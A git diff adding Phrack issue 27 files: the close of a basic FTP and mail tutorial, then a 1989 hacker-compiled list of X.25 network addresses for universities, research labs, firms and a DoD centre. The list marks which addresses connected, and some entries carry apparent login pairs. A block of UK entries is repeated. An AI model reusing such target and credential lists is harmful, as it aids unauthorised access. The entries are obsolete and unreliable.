+"mget" command with an asterisk to indicate every file:
+
+cd somedirectory
+mget *
+
+When you are done, use the "close" subcommand to break the communications link.
+You will still be in FTP, so you must use the "bye" subcommand to exit FTP and
+return to the command level.  The "quit" subcommand will close the connection
+and exit from FTP at the same time.
+
+
+Mail
+~~~~
+Mail is the simplest network facility to use in many ways.  All you have to do
+is to create your message, which can be done with a file editor or on the spur
+of the moment, and then send it.  Unlike FTP and Telnet, you do not need to
+know the password of the username on the remote computer.  This is so because
+you cannot change or access the files of the remote user nor can you use their
+account to run programs.  All you can do is to send a message.
+
+There is probably a program on your local computer which does mail between
+users on that computer.  Such a program is called a mailer.  This may or may
+not be the way to send or receive mail from other computers on the network,
+although integrated mailers are more and more common.  UNIX mailers will be
+used as an example in this discussion.
+
+Note that the protocol which is used to send and receive mail over a TCP/IP
+network is called SMTP, the "Simple Mail Transfer Protocol."  Typically, you
+will not use any program called SMTP, but rather your local mail program.
+
+UNIX mailers are usually used by invoking a program named "mail".  To receive
+new mail, simply type "mail".
+
+There are several varieties of UNIX mailers in existence.  Consult your local
+documentation for details.  For example, the command "man mail" prints out the
+manual pages for the mail program on your computer.
+
+To send mail, you usually specify the address of the recipient on the mail
+command.  For example: "mail knight@umcvmb.missouri.edu" will send the
+following message to username "knight" on host "umcvmb".
+
+You can usually type in your message one line at a time, pressing RETURN after
+each line and typing CONTROL-D to end the message. Other facilities to include
+already-existing files sometimes exist.  For example, Berkeley UNIXes allow you
+to enter commands similar to the following to include a file in your current
+mail message:
+
+r myfile
+
+In this example, the contents of "myfile" are inserted into the message at this
+point.
+
+Most UNIX systems allow you to send a file through the mail by using input
+redirection.  For example:
+
+mail knight@umcvmb.missouri.edu < myfile
+
+In this example, the contents of "myfile" are sent as a message to "knight" on
+"umcvmb."
+
+Note that in many UNIX systems the only distinction between mail bound for
+another user on the same computer and another user on a remote computer is
+simply the address specified.  That is, there is no hostname for local
+recipients.  Otherwise, mail functions in exactly the same way.  This is common
+for integrated mail packages.  The system knows whether to send the mail
+locally or through the network based on the address and the user is shielded
+from any other details.
+
+
+                  "The Quest For Knowledge Is Without End..."
+_______________________________________________________________________________
diff --git a/phrack27/4.txt b/phrack27/4.txt
new file mode 100644
index 0000000..269eff4
--- /dev/null
+++ b/phrack27/4.txt
@@ -0,0 +1,1937 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 27, File 4 of 12
+
+               :.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:
+               :.:                                           :.:
+               :.:  NUA-List For Datex-P And X.25 Networks   :.:
+               :.:                                           :.:
+               :.:               by Oberdaemon               :.:
+               :.:                                           :.:
+               :.:               April 9, 1989               :.:
+               :.:                                           :.:
+               :.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:
+
+ _____________________________________________________________________________
+|                                                                             |
+|  Key:                                                                       |
+|                                                                             |
+|  A    = successfully connected                                              |
+|  B    = sources say that it works                                           |
+|  C    = officially closed                                                   |
+|  D    = disconnected/no circuit or permanently busy                         |
+|  I    = illegal address or invalid call                                     |
+|  O    = out of order                                                        |
+|  r    = R-NUA                                                               |
+|  T    = time-out                                                            |
+|  X    = sources say that it should work but it doesn't (or is permanently   |
+|         busy)                                                               |
+|  Y    = barred (=?)                                                         |
+|  Z    = sources say that it should not work                                 |
+|      = including the following digits gives you another number             |
+|  n/a  = not yet tested                                                      |
+|  ?    = error on a subsequent communication system                          |
+|                                                                             |
+| Remark: I have also included some obviously misstyped NUAs which have been  |
+|         found in widely circulating lists.  There are also numbers which do |
+|         not form a valid NUA but a common prefix (e.g. 0202 2  Helpak).     |
+|                                                                             |
+| Format: Each NUA in this list consists of the following fields:             |
+|                                                                             |
+|         cccc naa aaa aaa... oooo...      ddd....                            |
+|                                                                             |
+|  cccc       is the country prefix (e.g. 0262 Germany). This prefix can be   |
+|             omitted when calling and called party have both the same prefix.|
+|  naa        are the first three digits of the address. n often specifies a  |
+|             certain network in that country.                                |
+|  aaa aaa... are the other digits of the address.                            |
+|  oooo...    are some extra digits/letters which should be added after the   |
+|             NUA. The correct syntax depends on your PAD. This list uses any |
+|             syntax - usually depending on the notation the author of the    |
+|             source used. The oooo... field is usually empty.                |
+|  ddd...     is a short description of the service.                          |
+|                                                                             |
+| If you find two NUAs who differ only in the number of trailing zeroes, but  |
+| connect to the same service, you may safely throw away the longer one.      |
+|                                                                             |
+|  !!  Please note that most PADs don't accept spaces inside a NUA  !!        |
+|_____________________________________________________________________________|
+
+
+  0200                  GR         Greece
+  0202
+  0202 2                           Helpak (enkelriktad trafik)
+X 0202 452 241 24104
+  0204                  NL         Netherlands
+  0204 0                           Datanet (1?)
+  0204 1                           Datanet (1?)
+A 0204 129 001 3                   ? (Netz ?)
+A 0204 129 001 4                   X.25
+A 0204 129 003 1                   NONOBY
+A 0204 129 003 4                   Searchline
+D 0204 129 004 33       SARA       National Institute for High Energy Physics
+                                   (NIKHEF) SARA network
+D 0204 129 004 34       NIKHEF     National Institute for High Energy Physics
+                                   (NIKHEF) SARA network
+D 0204 129 005 6        MCVAX      MCVAX, HOLLAND
+A 0204 129 005 675      HARING     MCVAX Line 2
+   0204 129 400 2                   DUPHAR WEESP,HOLLAND
+A 0204 134 014 80500               Utrecht ?
+  0204 303 0                       EPOIS EPO Den Haag
+  0204 304 0                       DSAMISOOM SAMSON
+  0204 4                           Dabas
+  0206                  B          Belgium
+  0206 2                           DCS
+A 0206 210 300 003                 Eigebib
+A 0206 222 100 6        BBDA       Brussels DEC A
+A 0206 222 101 2        ?          Ministry of economic affairs
+A 0206 222 102 6                   celex
+A 0206 224 001 903      PRLB2      Belgium Unix Backbone
+  0206 3                           Euronet
+A 0206 228 821 0                   DGxiiiF
+  0208                  F          France
+  0208 0                TRANSPAC   French Transpac
+A 0208 006 040 010                 Telesystemes 1
+A 0208 006 040 201                 Telesystemes 2
+A 0208 026 020 843                 ?
+A 0208 034 020 036      CNUSC      CNUSC (France)
+A 0208 034 020 258      CNUSC      CNUSC Montpelier
+A 0208 038 020 100                 CICG Grenoble
+A 0208 038 020 676                 ILL VEGA VAX 8700 VMS 4.7
+I 0208 044 001 645                 ?
+A 0208 057 040 540                 QSD (Chat system)
+I 0208 069 021 258
+A 0208 075 000 087      IRCAM      IRCAM-ERIK VAX 11/780 4.2 BSD
+I 0208 075 000 355                 ?
+I 0208 075 001 281*D    CCPN       Computing Centre Nuclear Physics
+I 0208 075 002 314                 GRF
+A 0208 075 020 655      LITP       LITP Unix 4.3 BSD (France)
+A 0208 075 041 280                 Pasteur MV8000
+A 0208 078 020 118      INRIA      INRIA, Rocquencourt (France) Multics
+B 0208 078 020 16901    INRIA      Institute National de Recherche en
+                                   Informatique
+  0208 078 081 67304    INRIAUU    INRIA - UUCICO
+I 0208 091 000 270*DCISICISI3      IBM - TSO
+I 0208 091 000 309*DCISICISI1      IBM - TSO
+I 0208 091 000 519*DCISICISI2      IBM - TSO
+I 0208 091 010 320      CJRCE
+I 0208 091 040 047      SACLAY     Saclay - France
+I 0208 091 040 532                 Pascal
+A 0208 091 190 258                 LURE, VAX 11/780 VMS 4.6, Synchrotron
+                                   source (SES)
+  0208 1                           NTI
+A 0208 101              TEXTFRA    Text Generator, FRANCE
+  0214                  E          Spain
+  0214 1                SPAIN      Spanish data network (NID/CTNE)
+  0214 5                           Iberpac
+O 0214 521 202 5022
+A 0214 521 302 1020                ETSITM (EANNET) VAX 11/750 VMS 4.5
+  0222                  I          Italy
+  0222 2                           Itapac
+A 0222 262 002 1        ESAIRS1    ESA-QUEST, IRS 1
+I 0222 262 002 2        ESAIRS2    ESA-IRS 2
+O 0222 262 003 2                   IASI VAX
+A 0222 262 004 3                   VAXLNF (INFNET) VAX 8650
+O 0222 263 200 4                   NUA-Information ?
+A 0222 265 014 0                   Techni-Link
+I 0222 306 3                       Progetto-Sirio
+I 0222 306 700                     European Space Agency
+I 0222 306 9*D          CNUCE      CNUCE
+I 0222 307 0                       CILEA
+I 0222 307 1                       CED Datenbanksysteme Rom
+I 0222 307 2*D          RTC20      JRC
+I 0222 307 7*D QUESTD5  ESA        ESA
+D 0222 307 8*D QUESTD5  ESA2       ESA
+  0228                  CH         Switzerland
+D 0228 310 1*DN         DATASTAR   Data-Star, Switzerland
+  0228 4                           Telepac
+A 0228 462 110 0101                Cigy IBMA
+A 0228 462 110 0102                Cigy DEC1091
+A 0228 462 110 09                  EDP Basel
+A 0228 462 110 23                  ?
+A 0228 462 110 34                  ?
+A 0228 462 110 36                  ?
+A 0228 462 110 52                  DANZA'S 11/785 VMS 4.4
+A 0228 462 110 61                  PKK node RBPK00
+A 0228 462 110 66                  PROGNOS Basel (CIERR 1402)
+A 0228 462 110 70                  ?
+A 0228 462 110 84                  (CIERR 1402)
+Y 0228 462 170 02                  INFOTEX PTT
+I 0228 464 109 06                  GD PTT Schweiz (ring with CTRL G)
+A 0228 464 110 10       DM         DATAMAIL (RSAG)
+A 0228 464 110 110      DSTAR2     Datastar (2nd. Line)
+A 0228 464 110 112                 RSAG
+Z 0228 464 110 113                 RSAG
+A 0228 464 110 115      DATASTAR   Data-Star, Switzerland (Pharmadatenbank ?)
+A 0228 468 113 150                 Management Joint Trust
+D 0228 468 114 05       CERN       CERN (=CERNXX?)
+A 0228 468 114 0505                CS Group LAVC on node UXCOMS
+A 0228 468 114 0510     CER        CERN, Geneva
+A 0228 468 114 0510     CERNVAX    CERN X25 Multigate
+B 0228 468 114 0510*DLO CERNLO     CERN 300 bps     OUTDIAL (where ???)
+B 0228 468 114 0510*DME CERNME     CERN 1200 bps    OUTDIAL (where ???)
+B 0228 468 114 0510*DHI            CERN ?
+A 0228 468 114 0514                4.2 BSD UNIX (Mint)
+A 0228 468 114 0515                Cern LS Group LAVC VXGIFT
+A 0228 468 114 0520                Cern
+A 0228 468 114 0532                Cern
+A 0228 468 114 0533                L3 test beam VAX-750 VXC3
+A 0228 468 114 0534                UXINFN
+A 0228 468 114 0538                CS Group LAVC on node UXCOMS
+A 0228 468 114 054                 Cern
+A 0228 468 114 0545                Cern
+A 0228 468 114 0551                VXCERN VMS 4.6
+A 0228 468 114 0553                VXCERN VMS 4.6
+A 0228 468 114 0556                VXCERN VMS 4.6
+A 0228 468 114 0560                CERN VXNA31
+A 0228 468 114 0561                CERN VXNA31
+A 0228 468 114 0562                L3 VAX 11/750 VXC3MU
+A 0228 468 114 0572                ISOLDES VAX 11/750
+A 0228 468 114 0574                ? (Operator)
+A 0228 468 114 0581                ?
+A 0228 468 114 0583                %Merit:X.25 (Merit Computer Network, see
+                                   appendix)
+A 0228 468 114 0584                Develcon
+A 0228 468 114 0587                ? (Operator)
+A 0228 468 114 0588                ? (Operator)
+A 0228 468 114 0589                ? (Operator)
+A 0228 468 114 0592                Princeton University High Energy Physics
+                                   Group Vax 11/750
+A 0228 468 114 0593                University of Michigan Physics Vax 11/750
+A 0228 468 114 0596                N.U. Physics Vax 11/750
+A 0228 468 114 0597                Harvard University High Energy Physics Lab.
+                                   Vax 8650
+A 0228 468 114 0598                MIT-LNS*PIERRE
+A 0228 468 114 0599                DoD, Distributed Databases Coordination
+                                    Center (JMILLER,X0TF3AP)
+D 0228 468 114 18                  BIOGEN (=GODEL?)
+A 0228 468 114 23                  EDCHUB::
+A 0228 469 110 02                  EPFL (something)
+A 0228 469 110 0202                EPFL HELP
+D 0228 469 110 0203                EPFL DE.VAX
+D 0228 469 110 0204                EPFL GC.VAX
+A 0228 469 110 0205                EPFL DP.VAX
+A 0228 469 110 0206                EPFL ME.VAX
+A 0228 469 110 0207                EPFL GR.VAX
+A 0228 469 110 0208                EPFL MA.VAX
+A 0228 469 110 0209                EPFL DI.VAX
+D 0228 469 110 0210                EPFL IMAC.PDP
+D 0228 469 110 0211                EPFL CGL.VAX
+D 0228 469 110 0212                EPFL DE.MVAX
+A 0228 469 110 0213                EPFL CC.VAX
+A 0228 469 110 03                  EPFL Cyber 855
+Ar0228 469 110 0301                EPFL Cyber
+A 0228 475 110 02                  HSG St.Gallen
+Ar0228 479 104 00                  Cern
+A 0228 479 110 23                  I.P.Sharp (CA)
+X 0228 479 110 86                  KOMETH (ETH ZH)
+A 0228 479 110 650                 KOMETH (ETH ZH)
+I 0228 479 111
+A 0228 479 111 06                  GRS
+I 0228 479 111 086
+I 0228 479 111 11
+I 0228 479 111 18                  ZEV-Mailbox Zuerich
+A 0228 479 111 750                 ComNet (R-Nua)
+A 0228 479 311 49                  KOMETH Output (ETH ZH)
+A 0228 499 111 02001               KOMETH (Entry Uni)
+  0228 9                           Radio-Suisse
+  0232                  A          Austria
+  0232 2                           Datex-P
+O 0232 242 210 91
+? 0232 242 211 42*DMAI             Sysnet Wien (Gast,Gast)
+A 0232 252 310 000                 Uni Wien
+  0232 9                           Radio Austri
+A 0232 911 602 323                 Inpadoc
+  0234                  GB         United Kingdom
+  0234 1                IPSS       IPSS UK network
+A 0234 110 020 02018               BT DIALCOM GROUP (PRESTEL ?)
+  0234 2                           PSS
+  0234 198 061 60                  Queen Marry C.
+B 0234 207 920 002                 SWVA
+  0234 211 920 100515              Hostess Doc.
+  0234 212                         Dialnet
+O 0234 212 080 105
+I 0234 212 080 110      EPSONUK    Epson (UK)
+A 0234 212 300 120      DIALNET    IGS Leased line to DIALOG in US
+A 0234 212 300 12011    DIALNET    LRS-DIALOG 2   Dialog via London
+Ar0234 212 300 12013    DIALMRC    LRS-Dialmail   (Reverse Charging)
+A 0234 212 300 120*D@   DIALNET    IGS Leased line to DIALOG in US
+A 0234 212 300 2920                GeoNet GEO2
+B 0234 212 301 161                 OPTEL
+  0234 212 301 186                 GEOSYSTEMS
+  0234 212 301 187                 CAP GROUP LTD.
+  0234 212 301 18722    CAP        CAP Industry Ltd.
+  0234 212 301 281                 ONE TO ONE COMMS
+O 0234 212 302 02192    PSSCLK     PSS Clock
+B 0234 212 399 12013    DIALMAL    Dialmail via London
+A 0234 212 900 115      STL        STL : ACER (BSD UNIX 4.2)
+  0234 213 000 11
+  0234 213 000 151      COMPUTAS   Computas Ltd
+  0234 213 000 1511                COMPUTAS LTD.
+D 0234 213 900 10150   ALVEY      Alvey Mail and FTP.
+  0234 214 200 162      GLAXO      Galaxo Industries
+  0234 214 400 12                  CONTROL DATA LTD.
+  0234 215 000 11600    C3
+  0234 215 710 104                 Consultans Ltd
+  0234 216 700 127      PFIZER     Pfizer, SANDWICH
+  0234 216 700 12701    PFIZER1    Pfizer, SANDWICH
+  0234 216 700 12702    PFIZER2    Pfizer, SANDWICH
+  0234 216 700 12703    PFIZER3    Pfizer, SANDWICH
+  0234 216 700 12704    PFIZER4    Pfizer, SANDWICH
+  0234 216 700 12706    PFIZER6    Pfizer, SANDWICH
+  0234 218 801 00300               British Telecom Hotline
+  0234 2                           PSS
+  0234 198 061 60                  Queen Marry C.
+B 0234 207 920 002                 SWVA
+  0234 211 920 100515              Hostess Doc.
+  0234 212                         Dialnet
+O 0234 212 080 105
+I 0234 212 080 110      EPSONUK    Epson (UK)
+A 0234 212 300 120      DIALNET    IGS Leased line to DIALOG in US
+A 0234 212 300 12011    DIALNET    LRS-DIALOG 2   Dialog via London
+Ar0234 212 300 12013    DIALMRC    LRS-Dialmail   (Reverse Charging)
+A 0234 212 300 120*D@   DIALNET    IGS Leased line to DIALOG in US
+A 0234 212 300 2920                GeoNet GEO2
+B 0234 212 301 161                 OPTEL
+  0234 212 301 186                 GEOSYSTEMS
+  0234 212 301 187                 CAP GROUP LTD.
+  0234 212 301 18722    CAP        CAP Industry Ltd.
+  0234 212 301 281                 ONE TO ONE COMMS
+O 0234 212 302 02192    PSSCLK     PSS Clock
+B 0234 212 399 12013    DIALMAL    Dialmail via London
+A 0234 212 900 115      STL        STL : ACER (BSD UNIX 4.2)
+  0234 213 000 11
+  0234 213 000 151      COMPUTAS   Computas Ltd
+  0234 213 000 1511                COMPUTAS LTD.
+D 0234 213 900 10150   ALVEY      Alvey Mail and FTP.
+  0234 214 200 162      GLAXO      Galaxo Industries
+  0234 214 400 12                  CONTROL DATA LTD.
+  0234 215 000 11600    C3
+  0234 215 710 104                 Consultans Ltd
+  0234 216 700 127      PFIZER     Pfizer, SANDWICH
+  0234 216 700 12701    PFIZER1    Pfizer, SANDWICH
+  0234 216 700 12702    PFIZER2    Pfizer, SANDWICH
+  0234 216 700 12703    PFIZER3    Pfizer, SANDWICH
+  0234 216 700 12704    PFIZER4    Pfizer, SANDWICH
+  0234 216 700 12706    PFIZER6    Pfizer, SANDWICH
+  0234 218 801 00300               British Telecom Hotline
+  0234 219                         PSS-Network
+  0234 219 200 001                 Network Monitoring Centre (NFS)
+  0234 219 200 002                 Network Monitoring Centre (NFS)
+  0234 219 200 100                 University of London Computing Centre
+  0234 219 200 10069    JANETGW    PSS/JANET Gateway (ULCC)
+B 0234 219 200 101                 Finsbury Data Service
+  0234 219 200 1082                BING COMPUTER SERVICES (EUROPE) LTD.
+A 0234 219 200 118      ADPUK      ADP NETWORK SERVICES LTD. (=AUTONET?)
+  0234 219 200 118                 atomic energy research establishment
+  0234 219 200 13370    QTLON      Quantime
+A 0234 219 200 146      CEGB       CEGB, Park Street, London
+B 0234 219 200 14869    ULCC       Univ. London Computer Centre (=JANET2?)
+B 0234 219 200 14918    UCLMVAX    UCL Microvax ARPA Gateway
+B 0234 219 200 14970
+  0234 219 200 154                 UNILEVER COMPUTER SERVICES LTD.
+A 0234 219 200 171      LEXIS      LEXIS
+A 0234 219 200 190      INFOLINE   PERGAMON INFOLINE LTD. (NFS)
+A 0234 219 200 203      IPSH       SHARP, I. P. ASSOCIATES LTD.
+A 0234 219 200 220                 BRITISH LIBRARY ON-LINE SYSTEM
+A 0234 219 200 222      BLAISE     British Library Information System
+  0234 219 200 297                 RLFE & NOLAN COMPUTER SERVICES PLC
+B 0234 219 200 300      UCL        University College London - Computer
+  0234 219 200 300      UCLFTP     UCL (FTP)
+A 0234 219 200 300      UCLMAIL    UCL (JNT Mail)
+  0234 219 200 304                 University Computing Company (GB) Ltd.
+B 0234 219 200 333      EUCLID     University College London  Computer Centre
+  0234 219 200 394      CISI       CISI (=SIANET?;=Computer Services, London?)
+  0234 219 200 871                 Instrument Rentals (UK) Ltd.
+B 0234 219 201 002      POOLE
+  0234 219 201 004      BGOLD81    Telecom BT-GOLD System 81
+  0234 219 201 00472    BGOLD72    Telecom BT-GOLD System 72
+  0234 219 201 00474    BGOLD74    Telecom BT-GOLD System 74
+  0234 219 201 00479    BTGOLD     Telecom BT-GOLD System 79
+  0234 219 201 00481    BTGOLDA    Telecom BT-GOLD System 81
+  0234 219 201 00482    BTGOLD82   Telecom BT-GOLD System 82
+  0234 219 201 00484    BGOLD84    Telecom Gold System 84
+  0234 219 201 005      PSSMAIL    PSS TELE-MAIL service
+B 0234 219 201 00513    DIANENQ    Euronet DIANE Enquiry Service
+                                   (=Echo,Rutherford?)
+B 0234 219 201 00513    EUROINFO   Euronet Diane Information Service
+                                   (=Echo,Rutherford?)
+A 0234 219 201 00515    BTDOC      BT Online Documentation Service
+A 0234 219 201 00515    HOSTESS    Hostess system (BT)
+  0234 219 201 00530    BAYNARD    BT Protocol Study Centre (NFS)
+  0234 219 201 00615    PSSDOC     PSS documentation service/X25 technical
+                                   info on line
+  0234 219 201 00620    BTBILL     BT Online Billing
+  0234 219 201 0100513
+  0234 219 201 01013    HOSTESS    Hostess system (BT) (=PSS Switchstream 1 ?)
+T 0234 219 201 01030    TSTB       British Telecom
+  0234 219 201 025      PRESTEL    BT Prestel Service
+  0234 219 201 02517
+  0234 219 201 07800
+  0234 219 201 15600    ESA1       ESA-IRS via London
+  0234 219 201 18       ADPUK      ADP Network Services Ltd
+  0234 219 210 050                 BT Mailbox facility (NFS)
+  0234 219 511 31       GEC        GEC Computers Borehamwood
+  0234 219 511 311      GECB       GEC Computers Ltd. Borehamwood
+  0234 219 513 11       GECB       GEC Computers Ltd. Borehamwood
+  0234 219 709 111                 Modular Computer Services Ltd. (MODCOMP)
+? 0234 219 709 111      NPL1       National Physical Laboratory
+  0234 219 709 210      NPL2       National Physical Laboratory, Protocol Std
+                                   Group
+B 0234 219 806 160      QMC        Queen Mary College London
+X 0234 220 200 1070                island-Adventure-Game
+X 0234 220 200 10700               island-Adventure-Game
+  0234 220 641 141      ESSX       Essex, University of, Computing Service
+                                   (2653,2653,Mist)
+A 0234 220 641 1411                MUD (Adventure Game), <guest>, <mist> or
+                                   <2653,2653>
+B 0234 221 222 122      MIDB       MIDNET Gateway at Birmingham (=MIDBHM)
+  0234 221 222 223      BIRP       Prime R & D at Birmingham
+  0234 221 222 225                 Freight Comp. Services
+  0234 222 236 163      CARDF      Cardiff, University College
+  0234 222 236 16300    CARDIFF    Univ. Coll. Cardiff Multics
+  0234 222 236 236      UWIST      University of Wales
+  0234 222 300 16102    ACORN      Acorn Computers
+  0234 222 339 399      CAMBRID    Cambridge University (Phoenix)
+  0234 222 530 303      SWURCC     South-West Universities
+  0234 222 530 30388    SWURCC     South-West Universities Network
+  0234 222 530 30398    SWCFTP     SWURCC (FTP)
+A 0234 222 715 151      KENT       University of Kent
+X 0234 222 715 11                  ? (---,Guest,Friend (call PIP))
+  0234 223 440          TI         Texas Instruments Ltd
+  0234 223 440 144      BED5       Prime R & D at Bedford (NFS)
+  0234 223 440 345      TI         Texas Instruments Ltd
+  0234 223 500 10998    HLH        High Level Hardware Ltd.
+B 0234 223 519 111      AERE       Atomic Energy Research Establishment at
+                                   Harwell
+T 0234 223 519 11198    ADA        ADA UK Database
+  0234 223 519 119169              JANET
+  0234 223 519 191      DLVAFTP    Daresbury SRS VAX (FTP)
+A 0234 223 519 191      JANET      Gateway to JANET at Rutherford
+  0234 223 519 191      OUCSFTP    OUCS VAX (FTP) - Experimental
+  0234 223 519 191      REVSFTP    ROE Starlink VAX (FTP)
+  0234 223 519 191      RLDAFTP    Rutherford DCS 11/70 (FTP)
+  0234 223 519 191      RLGBFTP    RL GEC (FTP)
+  0234 223 519 191      RLIBFTP    RL IBM 370 CMS (FTP)
+  0234 223 519 191      RLPCFTP    L Prime C (FTP)
+  0234 223 519 191      SERC       Gateway to SERCNET at Rutherford
+  0234 223 519 191      SERCENQ    SERCNET Acc & P/word Fac.
+  0234 223 519 191      SYPEFTP    Surrey Prime 550 (FTP)
+  0234 223 519 191      UEAFTP     East Anglia via SERC (FTP)
+  0234 223 519 191      ZUVSFTP    UCL Starlink VAX (FTP)
+A 0234 223 519 19169    SERCNET    R/ford XXX SERCnet g/way
+                                   (=DARESBURY,=JANET?)
+? 0234 223 519 19169,.10404000     Lancaster Uni
+B 0234 223 519 19169,.36           Oxford2
+? 0234 223 519 19169,49000001
+B 0234 223 519 19169,.50200014     Oxford
+B 0234 223 519 19169,.CPVC         Omega VAX
+A 0234 223 519 19169,.CPVD         Merlin VAX
+B 0234 225 621 126      DECSS      DEC Software Support VAX (=BEANO?)
+  0234 227 200 110                 GEAC 8000 ITI
+  0234 227 200 112      HPLB       HPLB (Hewlett Packard Labs, Bristol)
+  0234 227 230 230      BRST       University of Bristol
+  0234 227 230 23000    BRISTOL    University of Bristol
+  0234 227 230 231                 DLLON Comp. & Manag. Services Ltd.
+  0234 227 230 301                 GAC Computers Ltd.
+  0234 227 230 333      AVON       Avon Universities Computer Centre
+  0234 227 230 33300    AUCC       Avon Universities Computer Centre
+  0234 227 230 33398    AUCCFTP    AUCC (FTP)
+B 0234 227 900 102      BLAISE     British Library Information System
+  0234 227 900 10400    ESTELLE    STC Estelle
+  0234 227 900 14302    ITT        ITT Harlow (=ALCATEL?)
+  0234 231 300 101                 PRIME Office, Edinburgh
+  0234 231 300 102                 Forestry Commission FTP
+  0234 231 300 105      LATTLOG    Lattice Logic LTD
+  0234 231 300 107
+B 0234 231 354 354      ERCC       Edinburgh Regional Computer Centre
+  0234 231 354 35419    BUSHFTP    RCO 2988 (FTP)
+B 0234 231 354 35422    ERCC       ERCC - 2980, 2972 (EMAS) (=RCONET?)
+  0234 232 500 124      EXIS       EXIS
+I 0234 233 458 158      STAND      St. Andrews University VAX
+B 0234 233 458 15898    STANFTP    St. Andrews Univ. (FTP)
+  0234 234 417 117                 ICL at Bracknell
+  0234 227 230 333                 ?
+B 0234 239 232 323      EXETER1    Exeter University
+  0234 239 232 32304    EXTR       University of Exeter
+  0234 241 200 107
+  0234 241 260 106      SCRSX      University of Strathcylde PDP-11/44 (RSX)
+A 0234 241 260 10604               ? (,5020015,Birch/Bryan)
+  0234 241 260 260      GLSG       University of Glasgow (NFS)
+B 0234 241 260 26004               Glasgow
+  0234 246 200 10243               ICL West Gorton 'B' Service
+  0234 246 200 10248               ICL West Gorton 'X' Service
+  0234 246 200 10277               ICL West Gorton Perq
+  0234 246 240 240      ICLL       ICL at Letchworth (=Kidsgrove?) (NFS)
+  0234 247 300 103                 MTIER Management Systems Ltd.
+  0234 247 300 10300               Bridge, Switch
+  0234 247 300 10340               Bridge, (VAX/VMS)
+  0234 247 300 10345               Bridge, (MUX(VT100))
+  0234 247 300 10346               Bridge
+  0234 247 302 022      MHGA       LDC at Martlesham
+  0234 248 300 106                 DWENT-SDC Search Service
+  0234 248 321 321                 DWENT-SDC Search Service
+B 0234 251 248 248      LIVE       University of Liverpool
+  0234 252 724 241      BSL        BL Systems Ltd.
+  0234 253 265 165      LEEDS      University of Leeds (NFS)
+  0234 253 300 124      CAMTEC     Camtec, Leicester
+  0234 253 300 12406    CAMTEC     Camtec, Leicester (hard copy printer)
+  0234 258 200 106      ARC        Agricultural Research Council (GEC -
+                                   Switch)
+  0234 258 200 106      EMALFTP    East Malling (FTP)
+  0234 258 200 106      RESFTP     RES (Rothampstead) - FTP
+  0234 258 200 10604    AGRIFTP    AGRINET (CPSE) FTP
+  0234 258 200 10604    AGRINET    AGRINET Gateway
+  0234 258 200 10604    EASTMAL    East Malling
+  0234 258 240 242      GECD       GEC Computers Ltd at Dunstable
+  0234 258 240 24200    MRCA       GEC - Marconi Research Centre
+B 0234 260 227 227      MIDN       MIDNET Gateway at Nottingham (University
+                                   Leicester?) (=MIDNOT?)
+B 0234 261 456 8383                Microlink
+B 0234 261 600 119                 Manchester
+  0234 261 600 133                 IBM - SALE (also FTP)
+B 0234 261 600 152      UMDAFL     University of Manchester Dataflow VAX
+  0234 261 643 143      UMRCC      University of Manchester Regional Computer
+                                   Centre
+  0234 261 643 14398    UMRFTP     UMRCC (FTP)
+  0234 261 643 210      SALF       Salford University
+  0234 261 643 21090    SALFORD    Salford -> GANNET
+  0234 261 643 21090   NRS        NRS
+B 0234 261 643 343      FERRANTI   Feranti Computer Systems
+  0234 261 643 365                 ICLBRA
+  0234 261 643 36543               ICL West Gorton 'B' Service
+  0234 261 643 36548               ICL West Gorton 'X' Service
+  0234 261 643 36577               ICL West Gorton Perq (also FTP)
+  0234 262 500 484                 Software Sciences Ltd.
+B 0234 262 800 151                 CDM/EH (=Maidenhead?)
+  0234 262 800 43300
+B 0234 263 259 159      NUMAC      University of Newcastle
+  0234 264 200 136                 Primenet
+B 0234 270 500 115                 MAXXIM
+B 0234 270 500 142                 Farenham
+T 0234 270 500 15                  Uni Brighton (GUEST,WELCOME)
+  0234 270 712 217      HATF       Hatfield Polytechnic
+  0234 273 417 171      DEC-RDG    Digital Equipment Ltd Reading
+  0234 273 417 217      MODC       Modcomp
+  0234 273 417 317      DECR       DEC at Reading
+  0234 274 200 103                 SHEFFIELD, University of, Dept.of
+                                   Electronic & Elec...
+  0234 274 200 103*DCODUCODUS      Codus
+  0234 274 253 385                 DVY Computing Ltd.
+  0234 274 317 31
+  0234 275 300 102                 GIS Ltd.
+  0234 275 312 212      BOC        British Oxygen (=The World Reporter??)
+  0234 275 312 212      DATASOLVE  as above
+  0234 275 312 212      EUROLEX    British Oxygen Company
+  0234 275 317 173                 Lynx Computers Ltd.
+  0234 275 317 177                 TELEFILE Computer Services Ltd.
+  0234 275 317 177      GSI        GSI (NFS)
+  0234 278 228 282                 ICL Letchworth
+  0234 278 228 288                 ICL Letchworth
+  0234 284 400 108                 Culham, (VAX)
+  0234 284 400 123      ALVEY      Alvey Electronic Mail
+B 0234 289 500 109                 UXB
+  0234 290 468 168      YORK       York University PSS Gateway
+B 0234 290 468 168      YORKFTP    York University (FTP)
+  0234 290 468 168                 Gateway To DEC-10 At York
+  0234 290 468 16804    YORKTS     York TS29 Port
+  0234 290 524 242      RSRE       Radio, Space Research Establishment
+  0234 290 524 24203    RSREDL     RSRE
+  0234 290 524 24204    RSRESNK    RSRE
+  0234 290 524 24250   RSREA      Radio, Space Research Establishment for
+                                   ALVEY mail
+  0234 290 840 111      POLIS      SCION
+  0234 290 840 111      SCICON     SCICON, South England
+  0234 292 549 149      DL         SERC at Daresbury Laboratory
+  0234 293 212 212                 DATASOLVE LTD.
+  0234 293 212 212      BOC        British Oxygen Company (NFS)
+D 0234 293 765          ARTTEL     British Library, Boston Spa
+  0234 293 765 265                 British Library Lending Divi.
+  0234 299 212 221      NOLTON     Nolton Communications Ltd. (NFS)
+  0234 3                           Euronet
+  0234 307 813          EUROINFO   Euronet Diane Information Service
+  0234 8                TELEX      UK Telex network
+  0234 892 992 0        DECTELX
+I 0235 200 143 00165
+  0238                  DK         Denmark
+  0238 2                           Datapak
+A 0238 241 592 400                 Valby I/S Datacentralen
+A 0238 241 745 600      RECKU      Univac in Copenhagen University
+  0238 241 745 60000               Recku Univac (Enter @@ENQ)
+  0238 241 745 60002    UDIKU
+A 0238 242 126 400                 Lyngby DTB; I/S Datacentralen
+I 0238 389 3                       Euronet Aarhus
+  0240                  S          Sweden
+I 0240 181 559 76       LIUIDA S   Linkvping LiUIDA Teletex
+  0240 2                           Datapak
